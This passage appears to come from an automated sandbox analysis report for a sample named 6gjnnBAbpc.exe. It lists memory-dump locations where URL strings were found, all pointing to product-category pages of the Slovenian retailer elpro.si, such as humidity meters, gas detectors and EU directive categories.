https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/ventili-in-zascitne-naprave-za-merilnike-tla
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-vlage/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-vlage/comet-vlaga-dew-point-monitoring-kalibracija
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-vlage/michell-instruments-dew-point-merilniki-tock
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-vlage/prenosni-merilniki-vlage-temperature-in-atmo
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-vlage/rotronic-vlaga-aktivnost-vode-dew-point-moni
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/obnove-in-posodobitve-strojev-in-naprav/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/prenosni-osebni-detektorji-wireless/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/prenosni-osebni-detektorji-wireless/vecih-plinov-prenosni-os
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/prenosni-osebni-detektorji/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/prenosni-osebni-detektorji/vecih-plinov/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/2014-30-eu/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/2014-34-eu/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/2014-53-eu/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/60584/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/60751/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/ams-2750/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/cqi/
